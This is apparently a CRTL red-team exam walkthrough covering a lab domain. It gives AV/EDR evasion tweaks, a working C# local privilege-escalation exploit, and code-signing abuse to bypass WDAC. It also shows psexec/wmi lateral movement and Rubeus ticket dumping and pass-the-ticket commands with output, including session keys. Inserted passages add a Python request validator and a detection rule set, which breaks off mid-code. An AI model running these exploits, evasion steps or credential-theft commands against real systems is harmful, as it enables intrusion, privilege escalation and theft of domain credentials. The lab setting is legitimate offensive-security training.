Generate syscalls for the artifact kit: just follow the course material, generate all the needed files and copy them to the artifact kit folder. The last thing we need to modify is bypass-pipe.c, where we need to change the pipe name like so:

```c
//sprintf(pipename, "%c%c%c%c%c%c%c%c%cnerokek\\%d", 92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898));
sprintf(pipename, "\\%c.%c%c%c%c%c%clegit-%d-pipeu", 0x5c, 0x5c, 112, 105, 112, 101, 0x5c, (int)(GetTickCount() % 9898));
```

Once that's done you can compile your artifact kit using the build.sh script, but remember to comment out the x86 build and add '-masm=intel' to the x64 build in order to compile properly with the syscalls.asm file. Everything is in the RTO2 course material. Here is how a successful compilation looks:

Now you need to download your artifact kit to your attacker machine.

OK, but that's not everything, because you still need to recompile your sleepmask kit and mimikatz kit. For the sleepmask kit you just need to compile it with the build.sh script, and the same applies to the mimikatz kit. No other changes are required. Once you do that, just download those onto your attacker machine. Now your beacons should be good for bypassing the AV/EDR on the exam.

InlineExecute-Assembly

https://github.com/mihaid10/InlineExecute-Assembly

I know that the CRTL exam comes with limited tools, but this one BOF will save your life and will let you stress less on your exam.

Infrastructure Preparation

You need to follow the RTO2 course material to set up your redirectors and SSH tunnels for your beacon. Since it's really straightforward, I will only provide you with the .htaccess file for C2 and the default-ssl.conf file for apache2.
Here is how the .htaccess looks:

```apache
#RewriteCond %{HTTP_USER_AGENT} "Windows NT 10.0" [NC]
#RewriteRule .* https://localhost:8443/win-payload [P]
#RewriteRule ^test$ index.html [NC]
```

Here is the default-ssl.conf:

```apache
<IfModule mod_ssl.c>
    <VirtualHost _default_:443>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        SSLEngine on
        SSLProxyEngine on
        SSLProxyCheckPeerCN off
        SSLCertificateFile /etc/ssl/certs/public.crt
        SSLCertificateKeyFile /etc/ssl/private/private.key

        <FilesMatch "\.(cgi|shtml|phtml|php)$">
            SSLOptions +StdEnvVars
        </FilesMatch>
        <Directory /usr/lib/cgi-bin>
            SSLOptions +StdEnvVars
        </Directory>
    </VirtualHost>

    <Directory /var/www/html>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Require all granted
    </Directory>
</IfModule>
```

(Please remember to generate public.crt and private.key on the teamserver, not on the redirector, and just copy them to your redirectors.)

If you did everything correctly you should be fine and you shouldn't have any errors. Just remember that when you are hosting a file for download you must always specify the user agent with curl, like this:

```
curl -k -A "Legit Agent" https://<ip-redirector>/win-payload/beacon.exe -o Welcome.exe
```

WKSTN1 - How to pwn

Generate your beacon and download it with curl to WKSTN1. Once your beacon is executed you should pay attention to the AV, but your beacons will not be killed by it at all. The first thing is enumerating the machine, so please enumerate the running services. You will notice a service such as this:

```
C:\Users\consultant>sc qc customsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: customsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Custom Service\CustomApp.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : customsvc
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

This CustomApp.exe is our privilege escalation path.
If you know a little bit of RE you can copy this CustomApp to your consultant desktop and upload it to your attacker machine, where you can analyse the code using dnSpy. Here is the interesting code:

```csharp
namespace CustomApp
{
    // Token: 0x02000003 RID: 3
    public class IpcHandler
    {
        // Token: 0x06000003 RID: 3 RVA: 0x00002124 File Offset: 0x00000324
        public void Start()
        {
            this._listener = new TcpListener(IPAddress.Loopback, 6666);
            this._listener.Start(100);
            this._running = true;
            while (this._running)
            {
                TcpClient tcpClient = this._listener.AcceptTcpClient();
                IpcRequest ipcRequest = tcpClient.ReadData().Deserialize<IpcRequest>();
                if (ipcRequest == null || string.IsNullOrWhiteSpace(ipcRequest.Command))
                {
                    tcpClient.Close();
                    return;
                }
                IpcHandler.ProcessIpcRequest(ipcRequest);
                tcpClient.Close();
            }
        }

        // Token: 0x06000004 RID: 4 RVA: 0x0000219F File Offset: 0x0000039F
        public void Stop()
        {
            this._running = false;
            this._listener.Stop();
        }

        // Token: 0x06000005 RID: 5 RVA: 0x000021B4 File Offset: 0x000003B4
        private static void ProcessIpcRequest(IpcRequest request)
        {
            using (Process process = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName = request.Command,
                    Arguments = request.Arguments,
                    WindowStyle = ProcessWindowStyle.Hidden,
                    CreateNoWindow = true
                }
            })
            {
                process.Start();
            }
        }

        // Token: 0x04000001 RID: 1
        private TcpListener _listener;

        // Token: 0x04000002 RID: 2
        private bool _running;
    }
}
```

It starts a listener on port 6666 on the loopback address. Since the service runs as LocalSystem and passes the caller's Command and Arguments straight to Process.Start, any local user who can connect to that port gets a process running as SYSTEM.
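The defect in the decompiled handler is that nothing sits between the deserialised request and Process.Start. The following is an added example, not code from the CustomApp service or from this walkthrough: a Python model of the check the service should have made (an allowlist of canonical executable paths and of argument tokens), wired into a small loopback server so both sides of the exchange are visible. The allowlisted CustomHelper.exe and its two switches are invented for the example; the rejected request is the payload from the exploit below.

```python
import json
import ntpath
import socket
import threading

# Constructed allowlist for the example: the canonical (lower-cased, normalised)
# path of each executable the service is permitted to launch, mapped to the
# argument tokens it accepts. CustomHelper.exe and its switches are invented.
ALLOWLIST = {
    r"c:\program files\custom service\customhelper.exe": {"--status", "--rotate-logs"},
}


def canonical(path: str) -> str:
    """Normalise a Windows path so '..' segments, forward slashes and case
    differences cannot be used to slip past the allowlist."""
    return ntpath.normcase(ntpath.normpath(path))


def validate_ipc_request(raw: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one raw request body.

    This is the check the decompiled IpcHandler is missing: instead of passing
    request.Command straight to Process.Start, the executable must be an
    allowlisted absolute local path and every argument token must be expected."""
    try:
        req = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return False, "malformed JSON"
    if not isinstance(req, dict):
        return False, "request is not a JSON object"
    cmd, args = req.get("cmd"), req.get("args", "")
    if not isinstance(cmd, str) or not isinstance(args, str):
        return False, "cmd and args must be strings"
    path = canonical(cmd)
    if not ntpath.isabs(path) or path.startswith("\\\\"):
        return False, "executable must be an absolute local path"
    allowed_args = ALLOWLIST.get(path)
    if allowed_args is None:
        return False, f"executable not allowlisted: {path}"
    for token in args.split():
        if token not in allowed_args:
            return False, f"argument not allowlisted: {token}"
    return True, "ok"


def decide(cmd: str, args: str) -> tuple[bool, str]:
    """Convenience wrapper: build the JSON body the service expects and validate it."""
    return validate_ipc_request(json.dumps({"cmd": cmd, "args": args}).encode("utf-8"))


def serve_one(listener: socket.socket) -> None:
    """Accept one client, validate its request and reply with a JSON verdict.
    Nothing is executed here; a real service would launch only accepted
    requests, and only with the validated path and tokens."""
    conn, _ = listener.accept()
    with conn:
        accepted, reason = validate_ipc_request(conn.recv(4096))
        conn.sendall(json.dumps({"accepted": accepted, "reason": reason}).encode("utf-8"))


def send_request(port: int, request: dict) -> dict:
    """Client side of the exchange: send one request, read the verdict."""
    with socket.create_connection(("127.0.0.1", port)) as client:
        client.sendall(json.dumps(request).encode("utf-8"))
        client.shutdown(socket.SHUT_WR)
        reply = b""
        while chunk := client.recv(4096):
            reply += chunk
    return json.loads(reply.decode("utf-8"))


def demo() -> list[dict]:
    """Run the hardened handler on a loopback port and replay two requests:
    the walkthrough's payload (rejected) and a legitimate one (accepted)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(2)
    port = listener.getsockname()[1]
    requests = [
        {"cmd": "C:\\Windows\\System32\\cmd.exe",
         "args": "/c net localgroup administrators consultant /add"},
        {"cmd": "C:\\Program Files\\Custom Service\\CustomHelper.exe", "args": "--status"},
    ]
    verdicts = []
    for request in requests:
        worker = threading.Thread(target=serve_one, args=(listener,))
        worker.start()
        verdicts.append(send_request(port, request))
        worker.join()
    listener.close()
    return verdicts


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

The allowlist is keyed on the canonical path, so `..` segments, forward slashes and case changes all resolve to the same key before lookup; UNC paths are refused outright. Allowlisting is only half of a real fix: a loopback TCP port is reachable by every local user, so the service should also authenticate the peer (for example a named pipe with a restrictive DACL) rather than trust anything that can connect to 127.0.0.1.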
It waits for a JSON request with the following format:

```json
{
    "args": "/c something",
    "cmd": "C:\\Windows\\System32\\cmd.exe"
}
```

Here is my quick exploit for it, which will add consultant to the local Administrators group:

```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Json;
using System.Text;

namespace CustomApp
{
    [DataContract]
    public class IpcRequest
    {
        [DataMember(Name = "cmd")]
        public string Command { get; set; }

        [DataMember(Name = "args")]
        public string Arguments { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            // Define the server address and port
            string server = "127.0.0.1";
            int port = 6666;

            // Define the command and arguments to send
            string command = "C:\\windows\\system32\\cmd.exe";
            string argsString = "/c net localgroup administrators consultant /add";

            // Serialize the command and arguments to a JSON string
            IpcRequest request = new IpcRequest { Command = command, Arguments = argsString };
            MemoryStream stream = new MemoryStream();
            DataContractJsonSerializer serializer = new DataContractJsonSerializer(typeof(IpcRequest));
            serializer.WriteObject(stream, request);
            byte[] data = stream.ToArray();
            string json = Encoding.UTF8.GetString(data);
            Console.WriteLine("JSON data: " + json);

            // Connect to the server and send the serialized data
            try
            {
                using (TcpClient client = new TcpClient(server, port))
                {
                    using (NetworkStream stream1 = client.GetStream())
                    {
                        stream1.Write(data, 0, data.Length);
                        Console.WriteLine("Data sent successfully");

                        // The service never writes a reply; it closes the connection
                        // after handling the request, so this read returns 0 bytes.
                        byte[] buffer = new byte[1024];
                        int bytesRead = stream1.Read(buffer, 0, buffer.Length);
                        string response = Encoding.UTF8.GetString(buffer, 0, bytesRead);
                        Console.WriteLine($"Response received: {response}");
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine($"Failed to connect to {server} on port {port}: {ex.Message}");
            }

            Console.ReadLine(); // Prevent console window from closing
        }
    }
}
```

You can compile this code
using the following command line:

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\consultant\Desktop\Program.cs
```

Once compiled and executed you should see the following:

Please remember that the changes will not take effect until the machine is rebooted (otherwise you will have to enter your credentials into the UAC prompt each time you try to execute an administrative task).

Flag1 is on smann's desktop.

Once you get a beacon running in high integrity mode you can use the getsystem command to get a SYSTEM token and then list the running processes using ps. Once you do that you will notice that user khawkins has two processes running, one of which is powershell, which we can either steal_token or inject into in order to run as that user.

```
beacon> getsystem
[*] Tasked beacon to get SYSTEM
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 2755 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[*] Process List

 PID   PPID  Name                 User
 ---   ----  ----                 ----
 ...
 2308  636   CustomApp.exe        NT AUTHORITY\SYSTEM
 ...
 4400  8     powershell.exe       RTO2\khawkins
 4584  4400  conhost.exe          RTO2\khawkins
 ...
 [remaining rows and the Arch/Session columns omitted: the table did not survive extraction]

beacon> inject 4400 x64 smb
[*] Tasked beacon to inject windows/beacon_bind_pipe (\\.\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell) into 4400 (x64)
[+] host called home, sent: 260209 bytes
[+] established link to child beacon: 10.10.120.208
```

Now we need to use Certify to get a Code Signing Certificate in order to bypass WDAC on the SRV host and other hosts in the domain. You need to be khawkins because he is a member of the Developers group, which is the only group allowed to request this certificate.
Here is how:

```
beacon> execute-assembly C:\Tools\Obftools\Certify\YouAreFuckingStupid\bin\Release\YouAreFuckingStupid.exe request /ca:ca.redteamops2.local\sub-ca /template:RTO2CodeSigning
```

Copy the section from -----BEGIN RSA PRIVATE KEY----- through -----END CERTIFICATE----- to a file cert.pem on the teamserver. Convert it to a pfx file on the teamserver using the following command:

```
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

Very important! Download cert.pfx from the teamserver to the attacker machine and upload signtool.exe, cert.pfx and your beacon.exe to WKSTN1 through your beacon. Then use signtool to sign your beacon for use on the SRV host. If you don't do it this way you will break your certificate chain, because the attacker machine is not domain joined.

We can move laterally to SRV like this:

```
beacon> cd \\srv.redteamops2.local\c$\
beacon> upload C:\Payloads\beacon-signed.exe
beacon> remote-exec wmi SRV cmd.exe /c "C:\beacon-svc.exe"
beacon> link SRV <pipe>
```

Once we are on the SRV host we can grab flag2 from the Administrator desktop.

SRV

Once we are on SRV we first need to get a new beacon running as SYSTEM, either through getsystem or inject. Once we are running as SYSTEM you will need to execute Rubeus to view the tickets. I recommend signing Rubeus with cert.pfx, uploading it to the target and then executing it from disk. If AV is still a problem after you obfuscate your Rubeus, you can just disable it with PowerShell.
Now let's run Rubeus:

```
beacon> run GloryAndVictoryToMerlin.exe triage
[*] Tasked beacon to run: GloryAndVictoryToMerlin.exe triage
[+] host called home, sent: 52 bytes
[+] received output:

   [Rubeus banner]
   v2.0.3

Action: Triage Kerberos Tickets (All Users)

[*] Current LUID     : 0x3e7

 ----------------------------------------------------------------------------------------------------------------
 | LUID    | UserName                     | Service                                      | EndTime              |
 ----------------------------------------------------------------------------------------------------------------
 | 0xdad63 | smann @ REDTEAMOPS2.LOCAL    | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:24:32 PM |
 | 0xd0a98 | khawkins @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:36:07 PM |
 | 0x946d8 | khawkins @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:36:07 PM |
 | 0x3e4   | srv$ @ REDTEAMOPS2.LOCAL     | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:24:14 PM |
 | 0x3e4   | srv$ @ REDTEAMOPS2.LOCAL     | ldap/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:24:14 PM |
 | 0x3e4   | srv$ @ REDTEAMOPS2.LOCAL     | ldap/dc.redteamops2.local                    | 2/26/2023 6:24:14 PM |
 | 0x3e4   | srv$ @ REDTEAMOPS2.LOCAL     | cifs/dc.redteamops2.local                    | 2/26/2023 6:24:14 PM |
 | 0x3e7   | srv$ @ REDTEAMOPS2.LOCAL     | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:45:00 PM |
 | 0x3e7   | srv$ @ REDTEAMOPS2.LOCAL     | cifs/dc                                      | 2/26/2023 6:45:00 PM |
 | 0x3e7   | srv$ @ REDTEAMOPS2.LOCAL     | cifs/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:45:00 PM |
 | 0x3e7   | srv$ @ REDTEAMOPS2.LOCAL     | ldap/dc.redteamops2.local                    | 2/26/2023 6:45:00 PM |
 | 0x3e7   | srv$ @ REDTEAMOPS2.LOCAL     | SRV$                                         | 2/26/2023 6:45:00 PM |
 | 0x3e7   | srv$ @ REDTEAMOPS2.LOCAL     | LDAP/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:45:00 PM |
 ----------------------------------------------------------------------------------------------------------------
```

Now we need to dump the ticket:

```
beacon> run GloryAndVictoryToMerlin.exe dump /luid:0xdad63 /nowrap
[*] Tasked beacon to run: GloryAndVictoryToMerlin.exe dump /luid:0xdad63 /nowrap
[+] host called home, sent: 72 bytes
[+] received output:

   [Rubeus banner]
   v2.0.3

Action: Dump Kerberos Ticket Data (All Users)

[*] Target LUID     : 0xdad63
[*] Current LUID    : 0x3e7

  UserName                 : smann
  Domain                   : RTO2
  LogonId                  : 0xdad63
  UserSID                  : S-1-5-21-579679643-2453578207-2968119456-1110
  AuthenticationPackage    : Kerberos
  LogonType                : Network
  LogonTime                : 2/26/2023 9:49:42 AM
  LogonServer              :
  LogonServerDNSDomain     : REDTEAMOPS2.LOCAL
  UserPrincipalName        :

    ServiceName              :  krbtgt/REDTEAMOPS2.LOCAL
    ServiceRealm             :  REDTEAMOPS2.LOCAL
    UserName                 :  smann
    UserRealm                :  REDTEAMOPS2.LOCAL
    StartTime                :  2/26/2023 8:25:02 AM
    EndTime                  :  2/26/2023 6:24:32 PM
    RenewTill                :  3/5/2023 8:24:32 AM
    Flags                    :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
    KeyType                  :  aes256_cts_hmac_sha1
    Base64(key)              :  zY37uKr0MZZfPwLWSAJJ33ExJNb2V1BTq2k8hvuEKlE=
    Base64EncodedTicket      :  <base64ticket>
```

Now let's spawn a process for steal_token:

```
beacon> run GloryAndVictoryToMerlin.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:RTO2 /username:smann /password:FakePass /ticket:<base64ticket>
[+] host called home, sent: 2125 bytes
[+] received output:

   [Rubeus banner]
   v2.0.3

[*] Action: Create Process (/netonly)

[*] Using RTO2\smann:FakePass
[*] Showing process : False
[*] Username        : smann
[*] Domain          : RTO2
[*] Password        : FakePass
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 3360
[+] Ticket successfully imported!
[+] LUID            : 0xe7ce1

beacon> steal_token 3360
[*] Tasked beacon to steal token from PID 3360
[+] host called home, sent: 12 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> ls \\wkstn2.redteamops2.local\c$
[*] Tasked beacon to list files in \\wkstn2.redteamops2.local\c$
[+] host called home, sent: 47 bytes
[*] Listing: \\wkstn2.redteamops2.local\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     06/06/2022 11:38:01   $Recycle.Bin
          dir     06/06/2022 13:29:25   $WinREAgent
          dir     01/27/2022 18:18:49   Documents and Settings
          dir     12/07/2019 09:14:52   PerfLogs
          dir     06/16/2022 13:43:02   Program Files
          dir     10/06/2021 13:57:25   Program Files (x86)
          dir     09/21/2022 12:02:16   ProgramData
          dir     06/08/2022 08:43:18   Recovery
          dir     01/27/2022 18:19:18   System Volume Information
          dir     09/21/2022 12:01:14   Users
          dir     06/06/2022 14:37:15   Windows
 8kb      fil     02/26/2023 08:23:43   DumpStack.log.tmp
 796mb    fil     02/26/2023 08:23:43   hiberfil.sys
 832mb    fil     02/26/2023 08:23:43   pagefile.sys
 16mb     fil     02/26/2023 08:23:43   swapfile.sys

beacon> ls \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop
[*] Tasked beacon to list files in \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop
[+] host called home, sent: 69 bytes
[*] Listing: \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 282b     fil     06/06/2022 11:37:38   desktop.ini
 70b      fil     02/23/2023 20:05:56   flag3.txt

beacon> download \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt
[*] Tasked beacon to download \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt
[+] host called home, sent: 69 bytes
[*] started download of \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt (70 bytes)
[*] download of flag3.txt is complete
```

To get a beacon you can just do the following:

```
beacon> cd \\wkstn2.redteamops2.local\c$\
beacon> upload c:\Payloads\beacon-signed.exe
beacon> remote-exec psexec WKSTN2 cmd.exe /c "C:\beacon-signed.exe"
[*] Tasked beacon to run 'cmd.exe /c "C:\beacon-svc.exe"' on WKSTN2 via Service Control Manager
[+] host called home, sent: 2015 bytes
[+] received output:
Started service 4845abe on WKSTN2

beacon> link WKSTN2 PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[*] Tasked to link to \\WKSTN2\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[+] host called home, sent: 81 bytes
[+] established link to child beacon: 10.10.120.71
```

Now dump the tickets using Rubeus. This Rubeus must be signed with cert.pfx, otherwise you will get an error:

```
beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Loot\ObfRubeus.exe --assemblyargs triage --amsi --etw
[*] Running inlineExecute-Assembly by (@anthemtotheego)
[+] host called home, sent: 594728 bytes
[+] received output:

   [Rubeus banner]
   v2.0.3

Action: Triage Kerberos Tickets (All Users)

[*] Current LUID     : 0x3e7

 -----------------------------------------------------------------------------------------------------------------
 | LUID     | UserName                     | Service                                      | EndTime              |
 -----------------------------------------------------------------------------------------------------------------
 | 0x1e5839 | smann @ REDTEAMOPS2.LOCAL    | cifs/WKSTN2                                  | 2/26/2023 6:24:32 PM |
 | 0x1d868c | smann @ REDTEAMOPS2.LOCAL    | cifs/wkstn2.redteamops2.local                | 2/26/2023 6:24:32 PM |
 | 0x3938f  | lmurray @ REDTEAMOPS2.LOCAL  | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:24:32 PM |
 | 0x3938f  | lmurray @ REDTEAMOPS2.LOCAL  | LDAP/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:24:32 PM |
 | 0x3917f  | lmurray @ REDTEAMOPS2.LOCAL  | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:24:32 PM |
 | 0x3917f  | lmurray @ REDTEAMOPS2.LOCAL  | LDAP/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:24:32 PM |
 | 0x3e4    | wkstn2$ @ REDTEAMOPS2.LOCAL  | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:24:18 PM |
 | 0x3e4    | wkstn2$ @ REDTEAMOPS2.LOCAL  | GC/dc.redteamops2.local/redteamops2.local    | 2/26/2023 6:24:18 PM |
 | 0x3e4    | wkstn2$ @ REDTEAMOPS2.LOCAL  | cifs/dc.redteamops2.local                    | 2/26/2023 6:24:18 PM |
 | 0x3e4    | wkstn2$ @ REDTEAMOPS2.LOCAL  | ldap/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:24:18 PM |
 | 0x3e7    | wkstn2$ @ REDTEAMOPS2.LOCAL  | krbtgt/REDTEAMOPS2.LOCAL                     | 2/26/2023 6:24:18 PM |
 | 0x3e7    | wkstn2$ @ REDTEAMOPS2.LOCAL  | cifs/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:24:18 PM |
 | 0x3e7    | wkstn2$ @ REDTEAMOPS2.LOCAL  | WKSTN2$                                      | 2/26/2023 6:24:18 PM |
 | 0x3e7    | wkstn2$ @ REDTEAMOPS2.LOCAL  | LDAP/dc.redteamops2.local                    | 2/26/2023 6:24:18 PM |
 | 0x3e7    | wkstn2$ @ REDTEAMOPS2.LOCAL  | LDAP/dc.redteamops2.local/redteamops2.local  | 2/26/2023 6:24:18 PM |
 -----------------------------------------------------------------------------------------------------------------

[+] received output:
[+] inlineExecute-Assembly Finished

beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Loot\GloryAndVictoryToMerlin.exe --assemblyargs dump /luid:0x3938f /nowrap --amsi --etw
[*] Running inlineExecute-Assembly by (@anthemtotheego)
[+] host called home, sent: 594748 bytes
[+] received output:

   [Rubeus banner]
   v2.0.3

Action: Dump Kerberos Ticket Data (All Users)

[*] Target LUID     : 0x3938f
[*] Current LUID    : 0x3e7

  UserName                 : lmurray
  Domain                   : RTO2
  LogonId                  : 0x3938f
  UserSID                  : S-1-5-21-579679643-2453578207-2968119456-1105
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2/26/2023 8:24:31 AM
  LogonServer              : DC
  LogonServerDNSDomain     : REDTEAMOPS2.LOCAL
  UserPrincipalName        : lmurray@redteamops2.local

    ServiceName              :  krbtgt/REDTEAMOPS2.LOCAL
    ServiceRealm             :  REDTEAMOPS2.LOCAL
    UserName                 :  lmurray
    UserRealm                :  REDTEAMOPS2.LOCAL
    StartTime                :  2/26/2023 8:24:32 AM
    EndTime                  :  2/26/2023 6:24:32 PM
    RenewTill                :  3/5/2023 8:24:32 AM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  aes256_cts_hmac_sha1
    Base64(key)              :  TITM9RmcVagiksxO263OBTsmOZuneWL1cFGiEpYEb6Y=
    Base64EncodedTicket      :  <base64ticket>

beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Loot\GloryAndVictoryToMerlin.exe --assemblyargs createnetonly /program:C:\Windows\System32\cmd.exe /domain:RTO2 /username:lmurray /password:FakePass /ticket:<base64ticket>
[+] received output:

   [Rubeus banner]
   v2.0.3

[*] Action: Create Process (/netonly)

[*] Using RTO2\lmurray:FakePass
[*] Showing process : False
[*] Username        : lmurray
[*] Domain          : RTO2
[*] Password        : FakePass
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5080
[+] Ticket successfully imported!
[+] LUID            : 0x1f19d8
[+] received output:
[+] inlineExecute-Assembly Finished

beacon> steal_token 5080
beacon> ls \\dc.redteamops2.local\C$
[*] Tasked beacon to list files in \\dc.redteamops2.local\C$
[+] host called home, sent: 43 bytes
[*] Listing: \\dc.redteamops2.local\C$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     06/06/2022 11:19:59   $Recycle.Bin
          dir     05/11/2022 04:41:38   $WinREAgent
          dir     05/25/2022 05:27:11   Boot
          dir     08/19/2021 00:34:55   Documents and Settings
          dir     08/19/2021 07:24:49   EFI
          dir     05/08/2021 09:20:24   PerfLogs
          dir     06/06/2022 15:49:50   Program Files
          dir     05/11/2022 03:56:12   Program Files (x86)
          dir     09/21/2022 12:59:59   ProgramData
          dir     06/06/2022 10:59:03   Recovery
          dir     06/06/2022 11:30:53   System Volume Information
          dir     06/06/2022 11:00:20   Users
          dir     06/06/2022 11:33:48   Windows
 427kb    fil     05/25/2022 05:24:05   bootmgr
 1b       fil     05/08/2021 09:14:33   BOOTNXT
 12kb     fil     02/26/2023 08:22:53   DumpStack.log.tmp
 384mb    fil     02/26/2023 08:22:53   pagefile.sys

beacon> ls \\dc.redteamops2.local\C$\Users\Administrator\Desktop
[*] Tasked beacon to list files in .
[+] host called home, sent: 34 bytes
[*] Listing: \\dc.redteamops2.local\C$\Users\Administrator\Desktop\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 282b     fil     06/06/2022 11:19:46   desktop.ini
 70b      fil     02/23/2023 20:31:50   flag4.txt

beacon> upload C:\Payloads\beacon-signed.exe
[*] Tasked beacon to upload C:\Payloads\beacon-signed.exe as beacon-signed.exe
[+] host called home, sent: 450938 bytes
beacon> remote-exec psexec DC cmd.exe /c "C:\beacon-signed.exe"
[*] Tasked beacon to run 'cmd.exe /c "C:\beacon-signed.exe"' on DC via Service Control Manager
[+] host called home, sent: 2039 bytes
[+] received output:
Started service 35bf9d8 on DC

beacon> link DC PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[*] Tasked to link to \\DC\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell
[+] host called home, sent: 77 bytes
[+] established link to child beacon: 10.10.120.227
```
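The techniques in this walkthrough leave three distinctive traces: an SMB beacon pipe named like PowerShell's own PSHost pipe but created by a binary that is not PowerShell, the artifact-kit pipe name chosen at the top of the post, a service with a random 7-hex-character name wrapping cmd.exe /c (what remote-exec psexec installs), and a LOGON_TYPE = 9 logon produced by Rubeus createnetonly. The following is an added example written from the defender's side, not code from the walkthrough or from any of the tools it uses: a small rule set run over constructed telemetry shaped like Sysmon Event ID 17, System Event ID 7045 and Security Event ID 4624. The hosts, image paths and most field values are invented; only the pipe names, service names and logon type are the ones shown above.

```python
import re

# Constructed sample telemetry shaped like Sysmon Event ID 17 (pipe created),
# System log Event ID 7045 (service installed) and Security Event ID 4624
# (logon). Hosts, images and most values are invented for the example; the pipe
# names, service names and logon type are the ones that appear in the walkthrough.
EVENTS = [
    {"EventID": 17, "Computer": "WKSTN1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PipeName": r"\PSHost.133206677787088104.4400.DefaultAppDomain.powershell"},
    {"EventID": 17, "Computer": "WKSTN2", "Image": r"C:\beacon-signed.exe",
     "PipeName": r"\PSHost.133206677787088104.5916.DefaultAppDomain.powershell"},
    {"EventID": 17, "Computer": "WKSTN1", "Image": r"C:\Users\consultant\Downloads\Welcome.exe",
     "PipeName": r"\legit-4172-pipeu"},
    {"EventID": 17, "Computer": "WKSTN1", "Image": r"C:\Windows\System32\svchost.exe",
     "PipeName": r"\Winsock2\CatalogChangeListener-2ac-0"},
    {"EventID": 7045, "Computer": "WKSTN2", "ServiceName": "4845abe",
     "ImagePath": r'cmd.exe /c "C:\beacon-signed.exe"'},
    {"EventID": 7045, "Computer": "DC", "ServiceName": "35bf9d8",
     "ImagePath": r'cmd.exe /c "C:\beacon-signed.exe"'},
    {"EventID": 7045, "Computer": "SRV", "ServiceName": "VGAuthService",
     "ImagePath": r'"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"'},
    {"EventID": 4624, "Computer": "SRV", "LogonType": 9, "LogonProcessName": "seclogo",
     "TargetUserName": "smann", "TargetDomainName": "RTO2"},
    {"EventID": 4624, "Computer": "SRV", "LogonType": 3, "LogonProcessName": "Kerberos",
     "TargetUserName": "srv$", "TargetDomainName": "REDTEAMOPS2"},
]

# Images that legitimately create PSHost.<n>.<pid>.DefaultAppDomain.<name> pipes.
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
PSHOST_PIPE = re.compile(r"^\\PSHost\.\d+\.\d+\.DefaultAppDomain\.\w+$")
# The two artifact-kit pipe name shapes shown at the top of the walkthrough.
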